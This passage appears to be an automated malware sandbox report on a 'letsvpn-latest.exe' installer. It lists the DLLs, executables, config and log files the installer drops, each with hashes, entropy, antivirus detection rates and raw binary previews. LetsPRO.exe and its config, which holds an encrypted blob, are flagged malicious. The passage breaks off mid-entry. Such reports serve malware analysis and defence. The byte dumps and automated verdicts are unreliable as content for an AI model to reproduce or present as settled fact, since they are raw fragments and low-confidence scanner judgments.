                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..~............... ........... ....................................`.................................a...O....................... ...............T............................................ ............... ..H............text....|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B........................H.........................................................................{9...*..{:...*V.(;.....}9.....}:...*...0..A........u#.......4.,/(<....{9....{9...o=...,.(>....{:....{:...o?...*.*.*. ..1 )UU.Z(<....{9...o@...X )UU.Z(>....{:...oA...X*...0..b........r...p......%..{9......%q&....&...-.&.+...&...oB....%..{:......%q'....'...-.&.+...'...oB....(C...*..{D...*..{E...*V.(;.....}D.....}E...*.0..A........u(.......4.,/(<....{D....{D...o=...,.(>....{E....{E...o?...*.*.*. ...[ )UU.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.988106171788286
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Ou/ZC45lIZhqWOHlLf2KQcvBZ96DJS+ShjmM6IGBkS6mSvh:R/Z/lkq3b2KZBZMdS+ST6nkH
                                                                                                                                                                                                  MD5:EEF5553A62C9421A730CAE5A74B196B4
                                                                                                                                                                                                  SHA1:829F4010C8B325EEA88568F751D94E9ADB760679
                                                                                                                                                                                                  SHA-256:53E1E7F75B35BA11DD781E747BA6190B010EB104BCCCC695A19D0F60C4F88468
                                                                                                                                                                                                  SHA-512:CC6484D1042A688D9380899DF46D7EABC524E1DB41978CE7F5F60CEF66E9DD0B6D00909AC3DEF47D2DF90E194D779BD278B4A18F9A6857A5A5876FB8957121FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.6S...........!.................-... ...@....... ..............................h^....@..................................,..S....@.................. ....`.......+............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......$!..l...................P .......................................h....X|f.........+.j$....r.~.3i....m2.....'.|..OZ.ep..)t?...P6c.<<Qe.M...M.0.B.(+.v.Kk!...Y.....H..7r.[(.r....J_.!.....l.0..,...............~.......j.j.j....... .(....-.s....z*N.j...(....-.s....z*..(....*BSJB............v2.0.50727......l.......#~..(... ...#Strings....H.......#US.P.......#GUID...`.......#Blob...........W?........%3....................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.012730771621166
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:24TduWhqWOHlLf2KQcvBZ9SaqS+ShjmM6IGBkSm:Jdnq3b2KZBZbqS+ST6nkd
                                                                                                                                                                                                  MD5:839E774D3E0B80A9C407A1269D66D11A
                                                                                                                                                                                                  SHA1:76578166AAFDA33F896F195C890E6A36D9EECF42
                                                                                                                                                                                                  SHA-256:ABB8794A52C85A16A4CAD28C99FEA73AE4730ED7B2F708EF58894CC1791217C9
                                                                                                                                                                                                  SHA-512:37199AC53A2F137C529373FDBC9DDCB1A64DA78BE0E37EF15B2AF31276C115BEA04E0BF557F8124687AF20357A5DD1F2D5BD0B8C2483E2B389EEDE1295C148FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.6S...........!.................*... ...@....... ...............................T....@..................................*..K....@.................. ....`......H)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........!..D...................P .......................................!{.`DzN?...dr..1..9..NN/...[..t...2......C.......x..YCU......=....{.9W.J......^S.N;...iY........RBA......{..u..\~..1/M..^....~....(....-.s....z*J....(....-.s....z*..(....*.BSJB............v2.0.50727......l.......#~......`...#Strings....|.......#US.........#GUID...........#Blob...........G7........%3......................................................................y............... .......y.....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16416
                                                                                                                                                                                                  Entropy (8bit):6.978847822864083
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:DYMXhqWOHlLf2KQcvBZ9M+AS+ShjmM6IGBkSZ:Dxq3b2KZBZnAS+ST6nki
                                                                                                                                                                                                  MD5:B6634DCB0B38617B4345A4346DA620C7
                                                                                                                                                                                                  SHA1:D7F8903AF96F76B09189BB01B641A19B147138C8
                                                                                                                                                                                                  SHA-256:8A397246E984B4FD51A15C5E71BD217A92061F9AEC3CB6CFCB938834E9DD4B65
                                                                                                                                                                                                  SHA-512:ECD24F51763627E1CC90D0AA1491B5352B3222F744647821DBD8B18C080863A12FEB8FD79B1A4BEC733404D095FA37821280339C94C08CFEB142F632FA2CEC23
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.6S...........!.................(... ...@....... ..............................O.....@..................................'..W....@.................. ....`.......&............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H........ ......................P ......................................%.&...Fm........f...Dj..[..(...:w........s4H.. ...p.+^z...;_....~.k...|... ..q..+.cv.VZ.A.[[|..m.0...w.._m.<0...d-.[.R.BSJB............v2.0.50727......l.......#~...... ...#Strings.... .......#US.(.......#GUID...8.......#Blob...........G.........%3............................................................................3.....G.....U.....n.........'...................................%.7.........

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):221216
                                                                                                                                                                                                  Entropy (8bit):7.175286065819943
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:qRP7/P97ilHDqO01ktQOzB4YjDnX08RYA3fP5SQm4:qRPpilHD+kQA4uk8RYA3f9
                                                                                                                                                                                                  MD5:C855A1C05CCD6547B4FF0CCA4D872D13
                                                                                                                                                                                                  SHA1:07D5A6BA39B36629AE598AC09FCF54B8A3FB5173
                                                                                                                                                                                                  SHA-256:F53A3E13BE932261994E12A14BC9607B32CB2FE39C31027A1CEFCA4B90CDC4A5
                                                                                                                                                                                                  SHA-512:33C0E60A9A212133F98B6D93409CF9FEDC4CBE537B2E01A35DCE5350DB565A13962B8B2281DE1926E93870414F1EC507666A435716BB1CFE777D6481CFF1ED71
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....nX...........!.....(...........G... ........@.. ...............................t....@.................................`G..K....`...............2.. ............F............................................... ............... ..H............text....'... ...(.................. ..`.rsrc........`.......*..............@..@.reloc...............0..............@..B.................G......H........C..............D1......LC......................................F.~....o.........*..J.~..........o....*..0..E........u....-.*.t.......(....u....-.*..(............~....o...........o....*....0..T.......r...ps....re..ps.........r...p.....(.........(.................s....s....(.........*.0..G.............o....u....%-.&s......o....(...+(...+..,..#........o....+G.o....#........s....o...........o..........#.......?#.......?s....o....s.....s....%#........s....o....% h...ls...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):56864
                                                                                                                                                                                                  Entropy (8bit):6.227644515850694
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XfgAOG37OIh4Pqr8OvsQu4wwC9ZBMSq3b2KZBZpS+ST6nkYEIU:Xfgng6Ie1OvI4wwC9893qKj/mSU
                                                                                                                                                                                                  MD5:AAA8B3FA658B9620A798082968201334
                                                                                                                                                                                                  SHA1:660063E688A9C84F87B9F2C9F8FB11D5952139B9
                                                                                                                                                                                                  SHA-256:891C29FCB32C28C74E050BFD7D31D0C4C5FB2ABC5B877A542E25CB7DAA530189
                                                                                                                                                                                                  SHA-512:8AABA264914450716292D53AE86D631C37B3952304E51217CEC4BD83FE2BF958EF84D6C687D4D05A6D0FA52039A4856B393271C1E69D14A2454C1FAAB13F96AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Kn.V...........!..................... ........... ....................... ......k!....`.....................................O.......X............... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...X...........................@..@.reloc..............................@..B........................H........O...s...........................................................0..b............(....-P....=....s......o....o.......(.....o....o.......(....s....s............,..o.....~....*..........7R.......0..).......(.......(....-.#.......?*..( ......(!...*....0..).......(.......(....-.#.......?*..( ......("...*....0............s......o.....o...........o....-...(#....X...($.....+p.o.....3...(#......($.....(%...Y.Y..+J.o.....3...(#......(&.....(%...X.X..+$.o.....3...(#.....('...Y.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):629280
                                                                                                                                                                                                  Entropy (8bit):6.141793124988224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:ZTTh6UXqQ0l0l2b4GQnn9lXNbOpIeQjDfjJcxm04FSh+0Nsj8X+iKbH2Yjot8J:HaQ0SnPNb8IbJImZo4LF
                                                                                                                                                                                                  MD5:7A9664E3077147897846682A2541F393
                                                                                                                                                                                                  SHA1:5BF7093E86D48AF5BEDB93AEA5F7415EB8DDB5D8
                                                                                                                                                                                                  SHA-256:23D5B87425994CBC03DAB7F9C30A70FB0DF0264FE15243DF4B9F9A7731D87ADB
                                                                                                                                                                                                  SHA-512:ED8C0F8F00E750E04857B3650546FEB1CEC80196D8EE4FEB5F7BB7A5C2A5CAAB7B379E963A3FE10847C5305C488D5FDC926F00952BD22E990CF11088BDEB3183
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....L..........." ..0..b.............. ........... ..............................J.....`.....................................O....................l.. ...............T............................................ ............... ..H............text....`... ...b.................. ..`.rsrc................d..............@..@.reloc...............j..............@..B.......................H...........<N...........a..`...(.........................................{w...*..{x...*V.(y.....}w.....}x...*...0..;........u;.....,/(z....{w....{w...o{...,.(|....{x....{x...o}...*.*. .7.^ )UU.Z(z....{w...o~...X )UU.Z(|....{x...o....X*.0...........r...p......%..{w..........>.....>...-.q>........>...-.&.+...>...o.....%..{x..........?.....?...-.q?........?...-.&.+...?...o.....(....*..{....*..{....*V.(y.....}......}....*...0..;........u@.....,/(z....{.....{....o{...,.(|....{...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7918112
                                                                                                                                                                                                  Entropy (8bit):6.369226842144576
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:z1qq//2Zh39WUIKFE6gffcae/7ky9I83W2A:ZqrIKaf0L7kyS83W2A
                                                                                                                                                                                                  MD5:1135A24F997D3C473BFD8105223B93F3
                                                                                                                                                                                                  SHA1:EA5DB547FA0CBA6DBC588D975E73677F4CA8AC29
                                                                                                                                                                                                  SHA-256:0A6F43AFEC08D3BD41DA246A0AE22EFC4FB48C1788AA7890BCAC68CC22D0F780
                                                                                                                                                                                                  SHA-512:49B9CDD70FB84E55AC70872DDD49AAB40DD5438BDF6F39378C63BE6977D7F3C33B16C10505054050ED52FAE65B8FC755AB6901E6144813235DEEA894A81D0D40
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#......A...x...............A...Tn..........................|.......y...@... .......................y...... y......`y...............x. ....py.t............................Py.....................|"y.@............................text.....A.......A.................`.``.data.........A.......A.............@.p..rdata..l.0..pE...0..RE.............@.p@.bss....H.... v.......................p..edata........y.......u.............@.0@.idata....... y.......u.............@.0..CRT....,....@y.......v.............@.0..tls.... ....Py.......v.............@.0..rsrc........`y.......v.............@.0..reloc..t....py.......v.............@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):124392
                                                                                                                                                                                                  Entropy (8bit):5.750227631115462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:G803aH5iTX9ctYESyMlOs4u3yUyJCbtAYD7IPLdM1O3qKe/mU:X/wz9cyyM7kwwGOi/n
                                                                                                                                                                                                  MD5:764EF886ADF57B8C7233556114030BCB
                                                                                                                                                                                                  SHA1:F4FE2F5C57B27A1A23D286E18533E47466F18059
                                                                                                                                                                                                  SHA-256:26F5D45D9E94A2800B9752AD0D9FD83F97569E611A9ED45DCC36C0716F6A84CD
                                                                                                                                                                                                  SHA-512:DF19D04B1A2FD65098F99C64877301D76898724A5692F0166C0AC0E211C4F0395FD0DCDB7367F51096180D6BBE325AF30763902C992383BF090B9E9C3D8C7458
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?Hg.@............... ...................0....@.................................,......... ..............................`..........H.............. ...........................................................8a...............................text............ .................. .P`.data...,....0.......$..............@.0..rdata.......@.......&..............@.0@.bss....P....P........................p..idata.......`......................@.0..CRT....4....p.......6..............@.0..tls.... ............8..............@.0..rsrc...H............:..............@.0./4...................>..............@.@B/19..................B..............@..B/31.....B....`......................@..B/45.................................@..B/57.................."..............@.0B/70..................*..............@..B/81.................................@..B/92.....0............<..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1588256
                                                                                                                                                                                                  Entropy (8bit):6.9087996682239625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:omFBUz/C41ab246LQ1+wa/AjHvKUY6qHpJ:DQCyab2o+wukvbf2
                                                                                                                                                                                                  MD5:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  SHA1:C4C10199B5F7D50D641D115F9D049832EC836785
                                                                                                                                                                                                  SHA-256:A41077ED210D8D454D627D15663B7523C33E6F7386CD920A56FBCFBB0A37547D
                                                                                                                                                                                                  SHA-512:23C4AAC046FFDECAA64ACBEE9579634C419202BE43463927DFABF9798DED17B1B7A1199F1DB54E247D28D82F39F3F352AC3ACBADE2118C67717FD37260BD8B4F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..d............... ........@.. ....................................`....................................O.......\............... ....`......P...8............................................ ............... ..H............text...8b... ...d.................. ..`.rsrc...\............f..............@..@.reloc.......`......................@..B........................H............J...............z............................................{*...*..{+...*V.(,.....}*.....}+...*...0..A........u........4.,/(-....{*....{*...o....,.(/....{+....{+...o0...*.*.*. .z.. )UU.Z(-....{*...o1...X )UU.Z(/....{+...o2...X*...0..b........r...p......%..{*......%q.........-.&.+.......o3....%..{+......%q.........-.&.+.......o3....(4...*..(5...*^.(5..........%...}....*:.(5.....}....*:.(5.....}....*:.(,.....}....*..(6...*..(7...*..*J.{....%-.&*.o8...*..(5...*:.(

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe.config

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (5130)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27026
                                                                                                                                                                                                  Entropy (8bit):5.4569968058295055
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xBrbCvYVVQRlc1zeeSgDNZ7UcpE69SZDhH1tW2:xnVSe3v7B79SZDhH1tW2
                                                                                                                                                                                                  MD5:11752AA56F176FBBBF36420EC8DB613A
                                                                                                                                                                                                  SHA1:0AFFC2837CEE71750450911D11968E0692947F13
                                                                                                                                                                                                  SHA-256:D66328EB01118A727E919B52318562094F2FF593BD33E5D3AAB5E73602388DFA
                                                                                                                                                                                                  SHA-512:ED78045E4B6B85A1A0557C2CCD85A27E90DEFC48E50D2833D3D8D23526DC8D1040A64E883CB42AEA3052D499EA4C95E775384AE710B1222191EAD6F8B0E0B560
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>.<configuration>. <configSections>. <section name="EnvConfig" type="System.Configuration.NameValueSectionHandler"/>. </configSections>. <startup>. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.2"/>. </startup>. <EnvConfig>. <add key="data" value="8qUKDZPCDXvOaDVs8FuZ4EwMGD2jARGuTIWGtDO+e3fEsHqjqqrglFmwqp7KOY8QMH1kAljyJOVtWMVEipmR5TuCV75j+eruloErdFV2Y/RtTWo84JUolxSAFRpwd5wg1W0E9mKcPxvlvvJQb1HJRwCwpj0w2JCHJEGNrToA+NR1cYS26LuC0sk0TVCSkCgRdg+7IVJ3Pctho+eHXL10l3ynrZTRN4DnQL7cPUjYQwAGTD8iLkXB1QWUUtPmQs7b1qkr4wc7j6LvMMXHLtX2r7fAwUpiCIMKTYYC28UIv3tiIlQCV2ZCcAOo0b53tGJUCu3xmIwdnZtfqxJTgnN7+yAdU/Z8V4gg8QEIeyq8Z8minRSVosis/SPO/uv0IfluKf6FDrK2YvY8lXQtb1kPN6aqfm2uRgWYBov/IPEorqaxGu+iu5d+jbWnnlDt8WFSkLlgHHp32U9hS/RtHkHitzcMasjUTCEMqwZWSD8U5h3E0ED34gjI+gRellktkXNMGk8enYzgefNAauE9qpInHsiGfxsVmawHV+PaXAP0n228vzh6s+XgcST0jFHL0ddpgnf6kORN4BDRjUtlikmqrMm3kl4LOnkRdVn3md7icRjHoMOZHLq9gfLNH9WVS7KJLE+KvOZbNuO6bDDQktk2mWOEvH02yvUvwJ4Rnywepm

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23072
                                                                                                                                                                                                  Entropy (8bit):6.539242531365027
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:e8KcT7wZJt+/AeHVSh1hqWOHlLf2KQcvBZ9ymGS+ShjmM6IGBkSL6B:NT7wZL+4a07q3b2KZBZhGS+ST6nkB
                                                                                                                                                                                                  MD5:4FB031CB8840EE01CB6AA90696557143
                                                                                                                                                                                                  SHA1:B009C8C975929B73DD977969E6816066D57F39C6
                                                                                                                                                                                                  SHA-256:64B09932EF5B25F5C2C185FE955C7784AB23CDF7D12FDAD77FE05947E20006BA
                                                                                                                                                                                                  SHA-512:03731C0F6423F2FA3D6710B86C7CC41AA970058B818AB724321040984841DC451109638C813D564CB89DD00AF3962E84811AED5A3B37AE9A1B9C1FEBEB85AE60
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..$..........VC... ...`....... ....................................`..................................C..O....`...............,.. ...........tB..8............................................ ............... ..H............text...\#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............*..............@..B................7C......H.......P#..$...........................................................2r...p.(....*..(....*..(....*6r%..p..(....*6ru..p..(....*2r...p.(....*6r...p..(....*6rg..p..(....*2r...p.(....*2r...p.(....*:r...p...(....*.rs..p......%...%...%...%...%....(....*..(....*6r...p..(....*2rn..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*.rz..p......%...%...%...%...%....%....(....*2r...p.(....*..(....*2r...p.(....*6r...p..(....*:rI..p...(....*2r...p.(....*2r...p.(....*6r...p..(....*6ro..p..(

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31264
                                                                                                                                                                                                  Entropy (8bit):6.461508448145288
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:43kT+4YzHC2I3fpmoq3b2KZBZUS+ST6nkc:p+tHCHv4L3qKW/mm
                                                                                                                                                                                                  MD5:59D3183B3719B7F94E21F783594C63E9
                                                                                                                                                                                                  SHA1:ECA6B8C4211A09338EDE54E72D0729D7288F304F
                                                                                                                                                                                                  SHA-256:5A23DFB54F4AAFB8409687ED44A3AFF776BBDCE5008133D05C2F9A6F4E8F9466
                                                                                                                                                                                                  SHA-512:14F61E069A0CC203357AC7ABF9DFA4B1CD688C9B02020577669CEA3085704C90D58F09179155DA175C00D03D5700144A84524018CED00A6DDDA01F912E182242
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..D...........c... ........... ....................................`..................................c..O....................L.. ............c..8............................................ ............... ..H............text....C... ...D.................. ..`.rsrc................F..............@..@.reloc...............J..............@..B.................c......H.......X)...9...........................................................0..t...............................(.......(.......(!.........(....(....~....(...+~....(...+(....%(......r...p.(....(....(....*.0..U........(.....(....(....%(.....r=..p.r...p.(....(.....r...p.(....(....r...p.(....(....(....*....0..\........(......(.....(....(....%(.....r...p.r...p.(....(.....r9..p.(....(....r9..p.(....(....(....*.0..)........(....(....%(......r...p.(....(....(....*....0..$........(....%(

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Log\Lets.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8772)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):135364
                                                                                                                                                                                                  Entropy (8bit):6.016485795542628
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:zLoQRiLgADvJ1ID1LCk2CZhIfXWF4DAVCVQRS2/FY1URSvGZPv:vJRKgADvJggqhYdDrCRSU/
                                                                                                                                                                                                  MD5:C0681AE174E10CE9DCD451857287C82C
                                                                                                                                                                                                  SHA1:E99623C5E3B393BBD644624BDD2D30526DE79234
                                                                                                                                                                                                  SHA-256:A2D00997D0DC742D3E4CB4B2E84B8D9036DD9284F62D00C49604863D4704669F
                                                                                                                                                                                                  SHA-512:42A076D15F39D895075819FBCB58DED948029FE98BC21D313ED4130D38A5387EE41B3F335A9CB73C802703749B11E2041F5F77AE1F19AB05CF99F504D62D2167
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:TUhp7MNiskusbT6a7B1G+HpJDbkjiatsbc4az9ZU5b1CXLsEIx/J8XZmjy7ZhDv4XDWwj123.TUhp7MNiskusbT6a7B1G+HpJDbkjiatsbc4az9ZU5b1CXLsEIxjI+XZWnzDGzST37yEZa7m06ZOoimFD1Mv/OtKjNcf6reU=.TUhp7MNiskusbT6a7B1G+HpJDbkjiatsbc4az9ZU5b1CXLsEIx/J8XZZhCjPiib/1d9/h0PNauFNXyW7/A==.TUhp7MNiskusbT6a7B1G+HpJDbkjiatsbc4az9ZU5b1CXLsEIxfqyjpVnDnGpDr//85h6/O/ONFoU92Wx/IIiAvK6k3BqY+f9YB9nLnm8z2g9+BMqMcNDEQgmFVvOhaWv1X5v+vE0/+vWwRwwaDcZKY4NRxvNJPhLBAFfvq6xVRYpum3vSBE9heIItl0YAGURGP+4MH1FqmExt2agaHK4cEt/mLP/lvKFy5kW6e7TLuCL+bR57GRfjBHqIs5iqfMQhYB8H0zpiEzJID47HmAbWslTlK9JCihbJRZ35OX4Vl7UiFCmI1iYbtas6/SG1qNQjbwIuAXGen/nXRYGup9iNkgMFNcfVr4PY8//mwPWq/7qv/sJyezOrAXRRtuElrlUgAcu8ViI8RPtUzdsiagEe/jYLgXm0ZbNQk8Bv9Cekc7CokUfVh7Aoy0+NHup25MFGTythtf/c33Gg+Ff50tlECeBklgYV1Xps47iWfEnYC05YxOvnPGwXQeH99WWtBdXFDkddF2qju8R3Og8ge8cDXGPa+RsrLDdq8PY/14EEXl09GLk2yU/TAaEBZhzmGg8CczfQ==.TUhp7MNiskusbT6a7B1G+HpJDbkjiatsbc4az9ZU5b1CXLsEIxjp1DNennzPgyL/NrusxdwOnTdux2hgSw3ll0zsNw==.TUhp7MNiskusbT6a7B1G+HpJDbkjj6Fsbc4az9ZU5bWXKxrVhAqs6eJOH13kZbagz4H

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):123424
                                                                                                                                                                                                  Entropy (8bit):6.268913876963886
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:00OQlavbPZKNK9hhmPZEMn5xGFE45N+cX8fZzd97WWhT5wNSAQr7YTFoVaoOT8TQ:0b5vb/lmhMNGzWWhTdTK5N8Kg/I
                                                                                                                                                                                                  MD5:804EFCB7A1A2442810E3D05FDE0519DD
                                                                                                                                                                                                  SHA1:6FD55EC5795CEE7819B33EB2B86A99A2D2677D90
                                                                                                                                                                                                  SHA-256:181BB25BA4F3AF4BF678F6DA27C8B6AC6290308C144D5607B4978A6502B1C151
